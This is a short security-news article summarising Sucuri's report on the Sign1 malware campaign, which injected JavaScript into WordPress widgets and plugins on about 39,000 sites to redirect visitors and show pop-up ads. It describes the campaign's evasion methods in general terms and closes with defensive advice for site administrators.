A stealthy malware operation known as Sign1 has come to light, having compromised upwards of 39,000 websites powered by WordPress in the past half year. This alarming breach has led to unwelcome redirects and pop-up advertisements plaguing site visitors. Learn more about it below:
Unveiling the Sign1 Malware
Discovered by the vigilant team at Sucuri, the Sign1 malware has emerged as a significant threat. The attackers cunningly embed the malicious code within custom HTML widgets and legitimate plugins, a strategy that cleverly avoids tampering with core WordPress files, making detection more challenging.
The initial discovery stemmed from a routine investigation by Sucuri for a client whose site began sporadically bombarding visitors with pop-up ads, a hallmark of the Sign1 malware’s presence.
Infiltration Techniques and Evasion Tactics
The breach of Sucuri’s client was attributed to a brute force attack. While specific details regarding the compromise of other sites remain undisclosed, it is speculated that the attackers employed a blend of brute force assaults and exploitation of plugin vulnerabilities to infiltrate WordPress sites.
Once inside, the attackers preferentially utilize WordPress’s custom HTML widgets or, in many cases, the legitimate Simple Custom CSS and JS plugin, to inject their malicious JavaScript.
Sign1 is notably sophisticated in its evasion tactics; it employs time-based randomization to dynamically alter URLs every 10 minutes, circumventing conventional blocking efforts. The fleeting nature of these domains, registered just prior to their use in attacks, ensures they remain off blocklists.
Initially hosted on Namecheap, the attackers have since shifted their operations to HETZNER for web hosting, with Cloudflare providing an additional layer of anonymity via IP address obfuscation. The intricacies of the injected code, featuring XOR encoding and arbitrary variable names, pose significant challenges for security tools attempting detection.
Domains and number of Sign1 malware infections (Source: Sucuri)
A key aspect of the malware’s execution strategy involves targeting specific visitors, identified through referrers and cookies, from major platforms such as Google and Facebook, while maintaining dormancy otherwise. The malware ingeniously sets a cookie on the visitor’s browser, ensuring the disruptive pop-up manifests only once, thereby minimizing detection risks.
Victims are often redirected to deceitful sites, including bogus captchas designed to dupe individuals into enabling browser notifications, which subsequently serve as conduits for intrusive advertisements.
Evolving Threat Landscape
Sucuri’s insights reveal a concerning evolution of the Sign1 malware, with its stealth and resilience against blocks intensifying. The past six months have witnessed a dramatic surge in infections, particularly with the release of new malware iterations.
The recent spike in attacks, initiating in January 2024, underscores the escalating sophistication and adaptability of the Sign1 campaign. Such developments signal an urgent need for heightened vigilance and robust protective measures among website administrators.
Final Word
Website administrators are advised to fortify their defenses with robust passwords and ensure plugins are promptly updated to their latest versions. Additionally, removing unnecessary add-ons can significantly reduce the attack surface, fortifying your site against such insidious threats.
Anas Hasan
March 22, 2024
1 month ago
